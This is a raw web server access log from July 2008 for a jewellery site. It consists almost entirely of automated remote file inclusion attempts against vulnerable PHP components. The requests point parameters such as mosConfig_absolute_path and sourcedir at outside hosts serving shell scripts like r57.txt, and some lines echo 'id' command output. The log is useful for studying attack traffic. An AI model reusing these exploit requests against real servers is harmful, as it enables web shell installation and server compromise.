69.93.189.130 - - [31/Jul/2008:00:03:23 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
210.245.166.92 - - [31/Jul/2008:00:04:42 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [31/Jul/2008:00:04:42 -0700] "GET ///vwar/backup/errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [31/Jul/2008:00:04:43 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
212.50.0.218 - - [31/Jul/2008:00:05:05 -0700] "GET /?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.sojewels.com"
204.15.10.22 - - [31/Jul/2008:00:06:08 -0700] "GET /logs//main.php?sayfa=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sojewels.com"
204.15.10.22 - - [31/Jul/2008:00:06:08 -0700] "GET //main.php?sayfa=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sojewels.com"
62.169.0.50 - - [31/Jul/2008:00:07:25 -0700] "GET //main.php?sayfa=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sojewels.com"
62.169.0.50 - - [31/Jul/2008:00:07:25 -0700] "GET /logs//main.php?sayfa=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sojewels.com"
80.74.146.175 - - [31/Jul/2008:00:09:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
80.74.146.175 - - [31/Jul/2008:00:09:18 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
80.74.146.175 - - [31/Jul/2008:00:09:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.53.240.146 - - [31/Jul/2008:00:13:00 -0700] "GET //?include_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.sojewels.com"
74.53.240.146 - - [31/Jul/2008:00:13:00 -0700] "GET /logs//?include_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 1801 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.sojewels.com"
201.238.195.13 - - [31/Jul/2008:00:15:02 -0700] "GET /?sourcedir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [31/Jul/2008:00:20:42 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [31/Jul/2008:00:20:42 -0700] "GET //index.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [31/Jul/2008:00:20:42 -0700] "GET /logs//index.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [31/Jul/2008:00:21:05 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [31/Jul/2008:00:21:05 -0700] "GET //index.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [31/Jul/2008:00:21:06 -0700] "GET /logs//index.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
63.246.128.120 - - [31/Jul/2008:00:28:38 -0700] "GET /logs/access.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
63.246.128.120 - - [31/Jul/2008:00:28:39 -0700] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
63.246.128.120 - - [31/Jul/2008:00:28:39 -0700] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
83.102.137.163 - - [31/Jul/2008:00:29:05 -0700] "GET /logs/access.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
83.102.137.163 - - [31/Jul/2008:00:29:05 -0700] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.sojewels.com"
83.102.137.163 - - [31/Jul/2008:00:29:06 -0700] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.808" "www.sojewels.com"
208.80.193.29 - - [31/Jul/2008:00:29:18 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; PeoplePal 3.0; ZangoToolbar 4.8.2)" "sojewels.com"
89.111.179.12 - - [31/Jul/2008:00:29:20 -0700] "GET /logs/access.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.238.195.13 - - [31/Jul/2008:00:29:21 -0700] "GET /logs/access.log/?sourcedir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.238.195.13 - - [31/Jul/2008:00:29:22 -0700] "GET /logs/?sourcedir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
89.111.179.12 - - [31/Jul/2008:00:29:23 -0700] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.179.12 - - [31/Jul/2008:00:29:23 -0700] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
89.108.64.96 - - [31/Jul/2008:00:30:36 -0700] "GET /logs/access.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
89.108.64.96 - - [31/Jul/2008:00:30:36 -0700] "GET /logs/access.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
89.108.64.96 - - [31/Jul/2008:00:30:36 -0700] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.sojewels.com"
89.108.64.96 - - [31/Jul/2008:00:30:37 -0700] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.812" "www.sojewels.com"
89.108.64.96 - - [31/Jul/2008:00:30:41 -0700] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.812" "www.sojewels.com"
89.111.173.117 - - [31/Jul/2008:00:32:58 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.173.117 - - [31/Jul/2008:00:43:17 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.173.117 - - [31/Jul/2008:00:43:18 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.173.117 - - [31/Jul/2008:00:43:18 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.152.41.170 - - [31/Jul/2008:00:46:46 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.238.195.13 - - [31/Jul/2008:00:50:42 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
70.85.201.66 - - [31/Jul/2008:00:56:50 -0700] "GET /logs//index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.85.201.66 - - [31/Jul/2008:00:56:50 -0700] "GET /logs/access_080501.log//index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.85.201.66 - - [31/Jul/2008:00:56:50 -0700] "GET //index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.85.201.66 - - [31/Jul/2008:00:57:02 -0700] "GET /logs/access_080301.log//index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
212.50.0.218 - - [31/Jul/2008:00:59:24 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:08:20 -0700] "GET /logs//index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:08:20 -0700] "GET //index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:09:03 -0700] "GET /logs/access_080301.log//index.php?place=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.238.195.13 - - [31/Jul/2008:01:12:15 -0700] "GET /logs/access_080131.log/?sourcedir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
63.246.128.120 - - [31/Jul/2008:01:13:18 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.152.41.170 - - [31/Jul/2008:01:16:46 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
62.152.41.170 - - [31/Jul/2008:01:16:46 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:16:59 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:17:02 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:17:02 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:28:07 -0700] "GET /logs/access.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:28:13 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:28:16 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
205.234.198.174 - - [31/Jul/2008:01:29:41 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://tsunamibot.t35.com/off2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
205.234.198.174 - - [31/Jul/2008:01:29:41 -0700] "GET ///vwar/backup/errors.php?error=http://tsunamibot.t35.com/off2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
205.234.198.174 - - [31/Jul/2008:01:29:41 -0700] "GET /logs///vwar/backup/errors.php?error=http://tsunamibot.t35.com/off2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.64.48.146 - - [31/Jul/2008:01:42:53 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.127.253.161 - - [31/Jul/2008:01:43:44 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
65.55.210.151 - - [31/Jul/2008:01:46:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sojewels.com"
65.55.210.151 - - [31/Jul/2008:01:46:14 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sojewels.com"
210.127.253.161 - - [31/Jul/2008:01:48:43 -0700] "GET /logs/access.log/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.127.253.161 - - [31/Jul/2008:01:48:44 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.127.253.161 - - [31/Jul/2008:01:48:44 -0700] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
77.87.191.61 - - [31/Jul/2008:01:55:35 -0700] "GET /logs/access.log/errors.php?error=http://perevorot.org/cache/tits.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
77.87.191.61 - - [31/Jul/2008:01:55:35 -0700] "GET /logs/errors.php?error=http://perevorot.org/cache/tits.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
77.87.191.61 - - [31/Jul/2008:01:55:35 -0700] "GET /errors.php?error=http://perevorot.org/cache/tits.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
87.106.191.163 - - [31/Jul/2008:01:55:45 -0700] "GET /logs/access.log/errors.php?error=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.106.191.163 - - [31/Jul/2008:01:55:46 -0700] "GET /errors.php?error=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.106.191.163 - - [31/Jul/2008:01:55:46 -0700] "GET /logs/errors.php?error=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.108.64.96 - - [31/Jul/2008:01:56:03 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:01:57:57 -0700] "GET /logs/access_080301.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.127.253.161 - - [31/Jul/2008:01:59:38 -0700] "GET ///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:02:07:12 -0700] "GET /logs/access.log//param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:02:07:16 -0700] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
79.98.23.1 - - [31/Jul/2008:02:07:19 -0700] "GET //param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
83.223.15.168 - - [31/Jul/2008:02:17:53 -0700] "GET /logs/access.log/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.223.15.168 - - [31/Jul/2008:02:17:53 -0700] "GET /errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.223.15.168 - - [31/Jul/2008:02:17:53 -0700] "GET /logs/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
207.58.128.249 - - [31/Jul/2008:02:17:55 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
207.58.128.249 - - [31/Jul/2008:02:17:55 -0700] "GET /send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
207.58.128.249 - - [31/Jul/2008:02:17:55 -0700] "GET /logs/send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.72.112.142 - - [31/Jul/2008:02:18:27 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
64.72.112.142 - - [31/Jul/2008:02:18:27 -0700] "GET /send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
64.72.112.142 - - [31/Jul/2008:02:18:28 -0700] "GET /logs/send_reminders.php?includedir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:19:48 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:19:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:19:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:20:50 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:20:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:20:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
153.19.161.46 - - [31/Jul/2008:02:20:54 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
153.19.161.46 - - [31/Jul/2008:02:20:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
153.19.161.46 - - [31/Jul/2008:02:20:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.255.60.6 - - [31/Jul/2008:02:20:55 -0700] "GET /logs/access.log/atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.6 - - [31/Jul/2008:02:20:55 -0700] "GET /atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.6 - - [31/Jul/2008:02:20:56 -0700] "GET /logs/atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
207.58.128.249 - - [31/Jul/2008:02:22:19 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
207.58.128.249 - - [31/Jul/2008:02:22:38 -0700] "GET /send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
207.58.128.249 - - [31/Jul/2008:02:22:39 -0700] "GET /logs/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:24:11 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
153.19.161.46 - - [31/Jul/2008:02:24:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:26:06 -0700] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:26:18 -0700] "GET /logs/access.log/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:26:18 -0700] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:26:20 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:26:21 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:26:45 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:26:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:26:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.11.67.242 - - [31/Jul/2008:02:26:48 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [31/Jul/2008:02:26:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [31/Jul/2008:02:26:49 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:26:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:26:55 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:26:56 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
